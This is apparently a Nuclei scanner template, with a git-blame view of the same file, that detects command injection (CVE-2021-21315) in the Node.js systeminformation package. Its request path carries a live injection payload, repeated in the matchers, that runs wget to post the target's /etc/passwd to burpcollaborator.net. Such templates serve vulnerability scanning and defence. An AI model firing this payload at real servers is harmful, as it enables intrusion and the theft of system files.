nuclei-templates/cves/2021/CVE-2021-21315.yaml

id: CVE-2021-21315

info:
  name: Node.js Systeminformation Command Injection
  author: pikpikcu
  severity: high
  reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
  tags: nodejs,cve,cve2021

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - "wget --post-file /etc/passwd burpcollaborator.net"
          - name
          - running
          - pids
        part: body
        condition: and

      - type: status
        status:
          - 200
Create CVE-2021-21315.yaml 2021-03-02 11:02:08 +00:00			`id: CVE-2021-21315`

			`info:`
			`name: Node.js Systeminformation Command Injection`
			`author: pikpikcu`
			`severity: high`
			`reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC`
Update CVE-2021-21315.yaml 2021-03-04 14:58:32 +00:00			`tags: nodejs,cve,cve2021`
Create CVE-2021-21315.yaml 2021-03-02 11:02:08 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2021-21315.yaml 2021-03-02 17:43:48 +00:00			`- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"`
Create CVE-2021-21315.yaml 2021-03-02 11:02:08 +00:00
			`matchers-condition: and`
			`matchers:`

			`- type: word`
			`words:`
			`- "application/json"`
			`part: header`

			`- type: word`
			`words:`
Update CVE-2021-21315.yaml 2021-03-02 17:43:48 +00:00			`- "wget --post-file /etc/passwd burpcollaborator.net"`
improved matcher 2021-03-04 14:55:34 +00:00			`- name`
			`- running`
			`- pids`
Create CVE-2021-21315.yaml 2021-03-02 11:02:08 +00:00			`part: body`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`